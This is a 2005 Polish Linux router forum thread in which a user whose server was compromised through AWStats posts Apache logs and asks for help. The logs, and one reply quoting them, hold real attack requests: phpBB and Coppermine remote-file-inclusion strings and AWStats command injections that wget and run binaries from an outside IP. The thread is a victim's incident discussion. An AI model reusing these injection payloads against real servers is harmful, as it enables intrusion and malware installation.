Freesco, NND, CDN, EOS

http://www.freesco.pl
Dzisiaj jest poniedziałek, 30 czerwca 2025, 13:51

Posty bez odpowiedzi | Aktywne tematy


Indeks witryny » NND » Instalacja i konfiguracja (NND)

Strefa czasowa UTC+2godz.




Nowy temat Odpowiedz w temacie  Strona 1 z 1
  [ Posty: 6 ] 
  Podgląd wydruku Poprzedni temat | Następny temat 
Autor Wiadomość
provayder
Post: czwartek, 22 grudnia 2005, 18:37 
Offline
Użytkownik

Rejestracja: niedziela, 13 października 2002, 14:16
Posty: 146
Lokalizacja: Kalisz
Witam

Dziś rano rozmawiałem z kolegą i zwrócił mi on uwagę na jakieś dziwne logi Apache'a związane z Awstatsem. Ponieważ on Awstatsa nie ma więc jemu wiele nie groziło. Ja natomiast mam no i co się okazało: w katalogu /tmp znalazły się jakieś dziwne programy - pula, qs, mirela, które coś tam robiły (ogólnie moją uwagę zwrócił wzrost użycia procesora przez system - właśnie przez program pula).

Miał ktoś coś takiego?????

pozdro

_________________
provayder
Zielony Użytkownik Linuxa
ROUTER: DSL250 + Celeron 333MHz|Asus P2B|256MB RAM|HDD 40GB|NND 16.11 + pacman -Suy
uptime-project.net


Ostatnio zmieniony czwartek, 22 grudnia 2005, 23:58 przez provayder, łącznie zmieniany 1 raz

Na górę
 Wyświetl profil  
 
Maciek
 Tytuł:
Post: czwartek, 22 grudnia 2005, 19:04 
Offline
Honorowy Admin

Rejestracja: piątek, 5 lipca 2002, 17:30
Posty: 7800
Lokalizacja: Słupsk
Zapewne włam za pomocą automatu skanujacego - standardowa nazwa użytkownika i łatwe hasło. Dość często są takie przypadki, ktoś ma login marcin i hasło marcin - automaty do niedawna skanowały głownie imiona anglosaskie, od paru miesięcy bazy ich wzobogaciły się także o imiona polskie (jurek, marysia, zosia, jola). Im łatwiejsze hasła, tym łatwiej się włamać. Zapewne sa to programy do dalszego przeprowadzania zdalnych ataków. Przy dobrym układzie za jakiś czas włamywacz pozna twoje hasło roota i będzie panował nad serwerem.

_________________
Obrazek Belfer.one.PL
Obrazek Audio Cafe
Na górę
 Wyświetl profil  
 
provayder
 Tytuł:
Post: piątek, 23 grudnia 2005, 00:04 
Offline
Użytkownik

Rejestracja: niedziela, 13 października 2002, 14:16
Posty: 146
Lokalizacja: Kalisz
Logi wyglądają tak:

: [/] [] ()
24.92.208.192 - - [22/Dec/2005:20:08:27 +0100] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://209.136.48.69/cmd.dat?&cmd=cd%20/tmp;wget%20209.136.48.69/cbac;chmod%20744%20cbac;./cbac;echo%20YYY;echo|  HTTP/1.1" 404 297 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
24.92.208.192 - - [22/Dec/2005:20:08:33 +0100] "GET /modules/Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_path=http://209.136.48.69/cmd.dat?&cmd=cd%20/tmp;wget%20209.136.48.69/cbac;chmod%20744%20cbac;./cbac;echo%20YYY;echo|  HTTP/1.1" 404 313 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
24.92.208.192 - - [22/Dec/2005:20:08:38 +0100] "GET /admin_styles.phpadmin_styles.php?phpbb_root_path=http://209.136.48.69/cmd.dat?&cmd=cd%20/tmp;wget%20209.136.48.69/cbac;chmod%20744%20cbac;./cbac;echo%20YYY;echo|  HTTP/1.1" 404 292 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
24.92.208.192 - - [22/Dec/2005:20:08:44 +0100] "GET /Forums/admin/admin_styles.php?phpbb_root_path=http://209.136.48.69/cmd.dat?&cmd=cd%20/tmp;wget%20209.136.48.69/cbac;chmod%20744%20cbac;./cbac;echo%20YYY;echo|  HTTP/1.1" 404 289 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
24.92.208.192 - - [22/Dec/2005:20:08:49 +0100] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/cbac;chmod%20744%20cbac;./cbac;echo%20YYY;echo|  HTTP/1.1" 404 303 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
24.92.208.192 - - [22/Dec/2005:20:08:51 +0100] "GET /modules/coppermine/themes/default/theme.phptheme.php?THEME_DIR=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/cbac;chmod%20744%20cbac;./cbac;echo%20YYY;echo|  HTTP/1.1" 404 312 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
66.204.25.3 - - [22/Dec/2005:20:47:31 +0100] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|  HTTP/1.1" 403 282 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
guardian.nwsc.k12.ar.us - - [22/Dec/2005:20:47:29 +0100] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|  HTTP/1.1" 403 282 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
66.204.25.3 - - [22/Dec/2005:20:47:32 +0100] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|  HTTP/1.1" 403 290 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
66.204.25.3 - - [22/Dec/2005:20:47:33 +0100] "POST /xmlrpc.php HTTP/1.1" 404 270 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
66.204.25.3 - - [22/Dec/2005:20:47:34 +0100] "POST /blog/xmlrpc.php HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
66.204.25.3 - - [22/Dec/2005:20:47:35 +0100] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 282 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
66.204.25.3 - - [22/Dec/2005:20:47:37 +0100] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 283 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
66.204.25.3 - - [22/Dec/2005:20:47:38 +0100] "POST /drupal/xmlrpc.php HTTP/1.1" 404 277 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
66.204.25.3 - - [22/Dec/2005:20:47:39 +0100] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 283 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
66.204.25.3 - - [22/Dec/2005:20:47:40 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 280 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
66.204.25.3 - - [22/Dec/2005:20:47:41 +0100] "POST /xmlrpc.php HTTP/1.1" 404 270 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
66.204.25.3 - - [22/Dec/2005:20:47:43 +0100] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 277 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
66.204.25.3 - - [22/Dec/2005:20:47:44 +0100] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 277 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
GeSHi © Codebox Plus



pozdro

_________________
provayder
Zielony Użytkownik Linuxa
ROUTER: DSL250 + Celeron 333MHz|Asus P2B|256MB RAM|HDD 40GB|NND 16.11 + pacman -Suy
uptime-project.net
Na górę
 Wyświetl profil  
 
pablo2k5
 Tytuł:
Post: piątek, 23 grudnia 2005, 09:41 
Offline
Użytkownik

Rejestracja: środa, 25 maja 2005, 18:42
Posty: 193
Lokalizacja: Kozienice
Myślę że to jakiś wirus lub automat próbował "załamać" ci serwer przez wykorzystanie jakichś luk w bezpieczeństwie jego. Ja to samo miałem kiedyś. Czasami też pojawia się coś takiego że jest wysyłane zapytanie do serwera o treści x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/
x90/x90/x90/x90/x90/...

_________________
Obrazek
http://stats.opskozienice.pl
Na górę
 Wyświetl profil  
 
marask
 Tytuł:
Post: piątek, 23 grudnia 2005, 15:04 
Offline
Użytkownik

Rejestracja: sobota, 26 listopada 2005, 07:47
Posty: 864
a mnie ciekawi np ta linia:
: [/] [] ()
hpbb_root_path=http://209.136.48.69/cmd.dat?&cmd=cd%20/tmp;wget%20209.136.48.69/cbac;chmod%20744%20cbac;./cbac;echo%20YYY
GeSHi © Codebox Plus

wyglądaj akby ktoś skryptem php próbował pobierać programy na dysk ;]
Na górę
 Wyświetl profil  
 
provayder
 Tytuł:
Post: piątek, 23 grudnia 2005, 21:57 
Offline
Użytkownik

Rejestracja: niedziela, 13 października 2002, 14:16
Posty: 146
Lokalizacja: Kalisz
marask pisze:
a mnie ciekawi np ta linia:
: [/] [] ()
hpbb_root_path=http://209.136.48.69/cmd.dat?&cmd=cd%20/tmp;wget%20209.136.48.69/cbac;chmod%20744%20cbac;./cbac;echo%20YYY
GeSHi © Codebox Plus

wyglądaj akby ktoś skryptem php próbował pobierać programy na dysk ;]


no i tak było, chociaż weszło mi to na serwer przez perla a nie przez php. Pojawiły się w /tmp trzy pliki - jak wcześniej pisałem - pula, qs i mirela. Pliki były jakimiś programami-chyba serwerami bo jak zrobiłem podgląd to tych plików w mcedit to w tekstach przewijało się słówko gentoo, poza tym w /tmp pojawiły się jakieś logi, że jakiś serwer próbuje otworzyć port 578.
Zrobiłem skan całego dysku clamscanem i na szczęście nic nie znalazł. Niestety nie gwarantuje mi to jednak, że jeszcze jakieś progsy nie pożądane na serwerze nie siedzą.

pozdro

_________________
provayder
Zielony Użytkownik Linuxa
ROUTER: DSL250 + Celeron 333MHz|Asus P2B|256MB RAM|HDD 40GB|NND 16.11 + pacman -Suy
uptime-project.net
Na górę
 Wyświetl profil  
 
Wyświetl posty nie starsze niż:  Sortuj wg  
Nowy temat Odpowiedz w temacie  Strona 1 z 1
  [ Posty: 6 ] 

Indeks witryny » NND » Instalacja i konfiguracja (NND)

Strefa czasowa UTC+2godz.


Kto jest online

Użytkownicy przeglądający to forum: Obecnie na forum nie ma żadnego zarejestrowanego użytkownika i 22 gości

Nie możesz tworzyć nowych tematów
Nie możesz odpowiadać w tematach
Nie możesz zmieniać swoich postów
Nie możesz usuwać swoich postów
Nie możesz dodawać załączników

Szukaj:
Przejdź do:  
Technologię dostarcza phpBB® Forum Software © phpBB Group
Hosting: Compus-Net
RobertKonik.pl